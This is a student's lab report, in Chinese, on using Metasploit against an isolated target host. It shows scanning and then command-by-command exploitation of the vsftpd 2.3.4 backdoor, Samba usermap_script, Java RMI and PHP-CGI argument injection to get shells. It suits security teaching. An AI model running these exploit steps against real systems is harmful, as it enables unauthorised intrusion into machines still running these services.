20222327 2024-2025-1 《網路與系統攻防技術》實驗六實驗報告

QGOMLXG發表於2024-11-16

一、實驗內容

學習掌握了Metasploit工具的使用,具體的操作總結來說就是Search-Use-Show-Set-Exploit/run
學習了利用相關漏洞進行模擬攻擊的操作,對防範惡意攻擊有了一些認識(安裝殺軟,不要點選陌生網站、檔案連結等)

二、實驗過程

1、前期滲透

①主機發現(可用Aux中的arp_sweep,search一下就可以use)

首先su root進入root,防止沒有許可權進行埠包檢測

!!!先要檢查主機能否ping通靶機

進入msfconsole控制檯

使用search arp_sweep進行搜尋

使用0號 use 0後檢視所需引數show options

檢視靶機IP地址

設定靶機IPset rhosts 192.168.1.112之後執行run

掃描到了靶機

②埠掃描:可以直接用nmap,也可以用Aux中的portscan/tcp等。

利用Aux中的portscan/tcp,search portscan/tcpuse 0show options


設定目的埠、靶機IP等引數後執行


掃描到了0-65535中的以下埠

③掃描目標HTTP伺服器的HTTP版本資訊

use auxiliary/scanner/http/http_version
show missing
set RHOST 192.168.1.112
run

2、Vsftpd原始碼包後門漏洞(21埠)

漏洞原理:在特定版本的vsftpd伺服器程式中,被人惡意植入程式碼,當使用者名稱以“😃”為結尾,伺服器就會在6200埠監聽,並且能夠執行任意程式碼。
利用步驟:
在kali中執行msfconsole 啟動metasploit
use exploit/unix/ftp/vsftpd_234_backdoor 選擇漏洞
set RHOST 192.168.1.112(靶機IP)

run開始攻擊,利用成功,執行uname –a、 pwd、 id等命令 驗證

3、SambaMS-RPC Shell命令注入漏洞(埠139)

漏洞原理:Samba中負責在SAM資料庫更新使用者口令的程式碼未經過濾便將使用者輸入傳輸給了/bin/sh。如果在呼叫smb.conf中定義的外部指令碼時,透過對/bin/sh的MS-RPC呼叫提交了惡意輸入的話,就可能允許攻擊者以nobody使用者的許可權執行任意命令。

use exploit/multi/samba/usermap_script 選擇漏洞

set RHOST 192.168.1.112(靶機IP)

exploit 開始攻擊,執行uname–a驗證

4、Java RMI SERVER命令執行漏洞(1099埠)

漏洞原理:Java RMI Server的RMI登錄檔和RMI啟用服務的預設配置存在安全漏洞,可被利用導致程式碼執行。

根據前期掃描結果,靶機1099埠是開放的

然後在MSF中:
use exploit/multi/misc/java_rmi_server

show missing 檢視缺少的引數

set RHOST 192.168.1.112(靶機IP)

exploit/run

執行成功
sessions -i 4進如任務
shell

利用whoami驗證下

5、PHP CGI引數執行注入漏洞(80埠)

漏洞原理:CGI指令碼沒有正確處理請求引數,導致原始碼洩露,允許遠端攻擊者在請求引數中插入執行命令。
根據前期掃描結果可知,靶機80埠是開放的

use exploit/multi/http/php_cgi_arg_injection 選擇漏洞,設定IP引數set RHOST 192.168.1.112(靶機IP)

exploit/run 開始攻擊,進入shell後輸入ls檢視檔案

三、問題及解決方案

  • 問題1:在主機發現是,執行結果為
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

即靶機不可達

  • 問題1解決方案:經過測試,主機無法ping通靶機,隨後將靶機的網路介面卡從NAT改為和主機相同的自定義-VMnet0後發現可以ping通,主機掃描模組的執行結果也達到了預期

四、學習感悟、思考等

透過課後作業的不斷嘗試,已經熟悉了Metasploit的使用,總體來說就是

進入msfconsole
search 對應漏銅/掃描目的(主機、埠等)
use 對應的模組
show missing檢視缺少的引數(也可以用show options檢視所有的引數)
exploit/run進行執行

總體來說作業和實驗過程以及原理很好理解,主要是靶機的配置以及漏洞模組是否與靶機相匹配決定了最終執行是否能夠成功,從攻擊的角度來說Metasploit工具一定程度上提供了便利,從計算機使用者的角度來說,在日常學習生活中一定要警惕陌生的檔案、網站連結、配置好主機的安全策略,定時查殺病毒木馬,提高網路與系統安全防範意識。

參考資料

  • Metasploitable 2 Exploitability Guide

相關文章